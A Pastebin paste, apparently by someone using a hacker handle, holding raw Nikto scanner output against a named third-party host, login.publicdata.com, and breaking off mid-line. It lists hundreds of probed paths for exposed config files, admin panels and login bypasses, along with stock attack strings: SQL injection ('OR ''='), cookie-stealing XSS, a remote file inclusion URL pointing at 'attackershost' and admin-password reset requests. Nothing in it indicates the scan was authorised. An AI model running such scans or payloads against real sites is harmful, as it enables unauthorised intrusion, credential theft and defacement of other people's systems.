Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Follow @aptAnarch
- Anarchy@Kali~ nikto -h login.publicdata.com/promotion --output ~/Desktop/Publicdata.txt
- + Target Host: login.publicdata.com
- + Target Port: 443
- + GET The anti-clickjacking X-Frame-Options header is not present.
- + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + GET The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + GET The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + NALFGQUN Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + GET /promotion/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
- + GET /promotion/forums//admin/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/forums//adm/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/forums/config.php: PHP Config file may contain database IDs and passwords.
- + OSVDB-2411: GET /promotion/hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
- + OSVDB-59620: GET /promotion/inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
- + OSVDB-59619: GET /promotion/inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
- + OSVDB-59618: GET /promotion/inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
- + OSVDB-2703: GET /promotion/geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
- + OSVDB-8204: GET /promotion/gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
- + GET /promotion/guestbook/admin.php: Guestbook admin page available without authentication.
- + GET /promotion/basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
- + GET /promotion/basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
- + OSVDB-42680: GET /promotion/vider.php3: MySimpleNews may allow deleting of news items without authentication.
- + GET /promotion/administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
- + GET /promotion/pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
- + GET /promotion/basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
- + GET /promotion/admin/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/adm/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/administrator/config.php: PHP Config file may contain database IDs and passwords.
- + GET /promotion/contents.php?new_language=elvish&mode=select: Requesting a file with an invalid language selection from DC Portal may reveal the system path.
- + OSVDB-53303: GET /promotion/simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
- + OSVDB-44056: GET /promotion/sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
- + GET /promotion/typo3conf/localconf.php: TYPO3 config file found.
- + GET /promotion/cms/typo3conf/localconf.php: TYPO3 config file found.
- + GET /promotion/site/typo3conf/localconf.php: TYPO3 config file found.
- + GET /promotion/typo/typo3conf/localconf.php: TYPO3 config file found.
- + GET /promotion/typo3/typo3conf/localconf.php: TYPO3 config file found.
- + GET /promotion/webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + OSVDB-27071: GET /promotion/phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
- + GET /promotion/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
- + GET /promotion/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
- + GET /promotion/anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02
- + GET /promotion/cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
- + GET /promotion/admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
- + GET /promotion/config.php: PHP Config file may contain database IDs and passwords.
- + OSVDB-5280: GET /promotion/instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
- + OSVDB-29786: GET /promotion/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
- + OSVDB-29786: GET /promotion/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
- + GET /promotion/admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
- + OSVDB-3233: GET /promotion/admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
- + OSVDB-5034: GET /promotion/admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
- + OSVDB-5178: GET /promotion/dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
- + OSVDB-35876: GET /promotion/agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
- + GET /promotion/pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
- + OSVDB-2881: GET /promotion/pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
- + GET /promotion/logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
- + GET /promotion/manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
- + OSVDB-14329: GET /promotion/smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
- + OSVDB-113: GET /promotion/ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
- + GET /promotion/pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
- + OSVDB-2225: GET /promotion/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
- + OSVDB-155: GET /promotion/counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
- + OSVDB-3092: GET /promotion/admin.html: This might be interesting...
- + OSVDB-3092: GET /promotion/admin.php: This might be interesting...
- + OSVDB-3092: GET /promotion/admin.php3: This might be interesting...
- + OSVDB-3092: GET /promotion/easylog/easylog.html: This might be interesting...
- + OSVDB-3092: GET /promotion/log.html: This might be interesting...
- + OSVDB-3092: GET /promotion/logfile.html: This might be interesting...
- + OSVDB-3092: GET /promotion/logger.html: This might be interesting...
- + OSVDB-3092: GET /promotion/piranha/secure/passwd.php3: This might be interesting...
- + OSVDB-3092: GET /promotion/stats.html: This might be interesting...
- + OSVDB-3092: GET /promotion/test.html: This might be interesting...
- + OSVDB-3092: GET /promotion/wwwstats.html: This might be interesting...
- + OSVDB-3093: GET /promotion/admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/db.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/email.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/forum/viewtopic.php: phpBB found.
- + OSVDB-3093: GET /promotion/functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/cms/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/site/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/typo/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /promotion/_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3233: GET /promotion/tomcat-docs/index.html: Default Apache Tomcat documentation found.
- + OSVDB-3233: GET /promotion/php/index.php: Monkey Http Daemon default PHP file found.
- + OSVDB-3233: GET /promotion/help/home.html: Default Netscape manual found. All default pages should be removed.
- + OSVDB-3282: GET /promotion/uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
- + OSVDB-3396: GET /promotion/mlog.html: Remote file read vulnerability 1999-0068
- + OSVDB-3396: GET /promotion/php/mlog.html: Remote file read vulnerability 1999-0346
- + OSVDB-3501: GET /promotion/_private/form_results.html: This file may contain information submitted by other web users via forms. CVE-1999-1052.
- + OSVDB-3591: GET /promotion/project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
- + OSVDB-4161: GET /promotion/userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
- + OSVDB-9624: GET /promotion/pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
- + OSVDB-9624: GET /promotion/admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
- + OSVDB-3233: GET /promotion/aplogon.html: Oracle Applications Portal Page
- + OSVDB-3233: GET /promotion/appdet.html: Oracle Applications Portal Pages
- + OSVDB-3092: GET /promotion/install/install.php: Install file found.
- + OSVDB-3092: GET /promotion/install.php: install.php file found.
- + OSVDB-3092: GET /promotion/upgrade.php: upgrade.php was found.
- + OSVDB-3092: GET /promotion/xmlrpc.php: xmlrpc.php was found.
- + GET /promotion/admin1.php: Admin login page found.
- + GET /promotion/admin/account.html: Admin login page/section found.
- + GET /promotion/admin/account.php: Admin login page/section found.
- + GET /promotion/admin/controlpanel.html: Admin login page/section found.
- + GET /promotion/admin/controlpanel.php: Admin login page/section found.
- + GET /promotion/admin/cp.html: Admin login page/section found.
- + GET /promotion/admin/cp.php: Admin login page/section found.
- + GET /promotion/admin/home.php: Admin login page/section found.
- + GET /promotion/admin/index.html: Admin login page/section found.
- + GET /promotion/admin/login.html: Admin login page/section found.
- + GET /promotion/admin/login.php: Admin login page/section found.
- + GET /promotion/admin1.html: Admin login page/section found.
- + GET /promotion/admin2.html: Admin login page/section found.
- + GET /promotion/admin2.php: Admin login page/section found.
- + GET /promotion/admincontrol.html: Admin login page/section found.
- + GET /promotion/admincontrol.php: Admin login page/section found.
- + GET /promotion/administr8.html: Admin login page/section found.
- + GET /promotion/administr8.php: Admin login page/section found.
- + GET /promotion/administracao.php: Admin login page/section found.
- + GET /promotion/administraçao.php: Admin login page/section found.
- + GET /promotion/administracion.php: Admin login page/section found.
- + GET /promotion/administrateur.php: Admin login page/section found.
- + GET /promotion/administration.html: Admin login page/section found.
- + GET /promotion/administration.php: Admin login page/section found.
- + GET /promotion/administrator.html: Admin login page/section found.
- + GET /promotion/administrator.php: Admin login page/section found.
- + GET /promotion/administrator/account.html: Admin login page/section found.
- + GET /promotion/administrator/account.php: Admin login page/section found.
- + GET /promotion/administrator/index.html: Admin login page/section found.
- + GET /promotion/administrator/index.php: Admin login page/section found.
- + GET /promotion/administrator/login.html: Admin login page/section found.
- + GET /promotion/administrator/login.php: Admin login page/section found.
- + GET /promotion/adminisztrátora.php: Admin login page/section found.
- + GET /promotion/adminpanel.html: Admin login page/section found.
- + GET /promotion/adminpanel.php: Admin login page/section found.
- + GET /promotion/admins.html: Admin login page/section found.
- + GET /promotion/admins.php: Admin login page/section found.
- + GET /promotion/amministratore.php: Admin login page/section found.
- + GET /promotion/beheerder.php: Admin login page/section found.
- + GET /promotion/ccms/index.php: Admin login page/section found.
- + GET /promotion/ccms/login.php: Admin login page/section found.
- + GET /promotion/controlpanel.html: Admin login page/section found.
- + GET /promotion/controlpanel.php: Admin login page/section found.
- + GET /promotion/cp.html: Admin login page/section found.
- + GET /promotion/cp.php: Admin login page/section found.
- + GET /promotion/fileadmin.html: Admin login page/section found.
- + GET /promotion/fileadmin.php: Admin login page/section found.
- + GET /promotion/login.html: Admin login page/section found.
- + GET /promotion/login.php: Admin login page/section found.
- + GET /promotion/modelsearch/login.php: Admin login page/section found.
- + GET /promotion/moderator.html: Admin login page/section found.
- + GET /promotion/moderator.php: Admin login page/section found.
- + GET /promotion/moderator/admin.h
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement